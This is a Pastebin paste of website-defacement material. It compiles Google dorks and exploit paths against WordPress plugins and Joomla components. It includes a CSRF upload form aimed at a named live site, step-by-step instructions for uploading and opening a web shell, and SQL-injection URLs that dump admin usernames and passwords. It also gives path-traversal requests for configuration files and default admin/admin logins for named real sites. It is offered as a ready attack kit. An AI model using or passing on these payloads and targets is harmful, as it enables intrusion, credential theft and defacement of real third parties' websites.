Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Deface with Plugins Reflex Gallery
- --------------------------------------------------------------------
- - Dork : inurl:/wp-content/plugins/reflex-gallery/
- - Exploit : wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php
- - Vuln : {"error":"No files were uploaded."}
- - Site Vuln : http://sjoyster.com/
- - Script CSRF :
- <html>
- <title>Reflex-Gallery CSRF</title>
- <form method="POST" action="http://straightlineinspection.com/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php" enctype="multipart/form-data" >
- <input type="file" name="qqfile"><br>
- <input type="submit" name="Submit" value="Pwn!">
- </form>
- </html>
- ----------------------------------------------------------------------
- Okay Lets Go to Tutorial
- - Save script CSRF [ reflex.html ]
- - Change The Site , to site Vuln
- - Save
- - Chek The Vuln
- - Oh yeah , that vuln :D
- - Open The Script in the Browser
- - Upload your shell
- - bcc.php is my shell :)
- - Click " Pwn!"
- - Succses :D
- - Open your Shell in the :
- [ site.com/wp-content/uploads/shell.php
- - T R A C Y
- ++--+-+-+2exploit+-+/-+-+-/
- # Exploit: /index.php?option=com_spidercalendar&calendar_id=1
- ----
- Exploit : http://web/wp-content/plugins/revslider/temp/update_extract/exp.php
- Dork :
- inurl:wp-content/plugins/revslider/
- inurl:revslider
- inurl:revslider_admin.php
- inurl:revslider_front.php
- inurl:plugins/revslider/
- intext:Powered by Revslider
- intitle:"Index Of/ revslider"
- intitle:"Index Of/wp-content/themes/revslider"
- intitle:"Index Of/wp-content/plugins/revslider"
- intitle:"Index Of/admin/revslider"
- intitle:"Index Of/fr/revslider"
- intitle:"Index Of/en/revslider"
- intitle:"Index Of/us/revslider"
- intitle:"Index Of/ar/revslider"
- intitle:"Index Of/es/revslider"
- intitle:"Index Of/de/revslider"
- -----
- Easy-exploit-joomla-Sites
- Dork:inurl:"index.php?option=com_simplephotogallery"
- /index.php?option=com_simplephotogallery&view=images&albumid=-1+/*!uNiON*/+/*!SeLeCt*/+1,concat%28username,0x3a,password%29,3,4,5,6,7,8,9,10,11,12+from+jos_users--+
- -----
- Joomla Components (com_ignitegallery) SQL-Injection Vulnerabilities -
- Dorks: inurl:com_ignitegallery , Exploits: /index.php?
- option=com_ignitegallery&task=view&gallery=-1+union+select+1,2,concat(username,char(58),password)UAH,4,5,6,7,8,9,10+from+jos_users--&Itemid=18
- -----
- Joomla Exploit : com maian15
- Dork : "inurl:option=com_maian15"
- Exploit:
- /administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?
- -----
- Deface Metode Wordpress bazar Theme Arbitrary File Download Vulnerability
- Dork: inurl:wp-content/themes/bazar/
- exploit: /wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php
- -----
- exploit bypass admin
- inurl
- allinurl:galimg
- inurl:galorg
- index of /galorg site:ae
- target
- http://mspmt.com/adminaccess/welcome.asp
- http://www.extrememarineme.com/adminaccess/welcome.asp
- add
- adminaccess/welcome.asp
- user=admin pass=admin
- adminaccess/gallery.aspx
- upload your shell
- http://mspmt.com/
- -----
- Upload dork and exploit :3
- Dorks :
- inurl:/upload.php
- inurl /uploadbutton.html
- inurl /upload-form.php
- inurl /upload/up.php
- inurl /upload.html
- -----
- Dokeos Upload
- 😊😊😊😊
- Dork:inurl:/index.php?include=Overview.html
- Exploit:/main/inc/lib/fckeditor/editor/plugins/ImageManager/manager.php
- -----😊😊😊😊
- Dork : inurl:"admin/my_documents/my_files"
- Exploit : admin/rte_popup_file_atch.asp
- -----
- Dork:inurl:"/mfm.php"
- -----
- Dork:intitle:"index of" people.lst.
- dork : "Webdesign by: basicamente.pt"
- [ Sitetarget.com/filemanager/dialog.php ] Upload Your File. Ur file [Sitetarget.com/uploads/yourfile.html]
- http://www.koochecinema.com/ckfinder/ckfinder.html
- # 1:Search Google Dork and Choose a Target Dork : inurl:viewtable?cid= site:it # 2: exploit: /index.php?option=com_fabrik&c=import&view=import&fietype=csv&tableid=0&Itemid=0 # 3: upload shell.php or index.html
- Exploit: /admin/include/download.php?path=../config/&file=database.php
- [+] Dork: inurl:sele.php
- DORK :
- "Webdesign by: criativo.net"
- "Webdesign by: risema.pt"
- "Webdesign by: basicamente.pt"
- EXPLOIT :
- /filemanager/dialog.php
Add Comment
Please, Sign In to add comment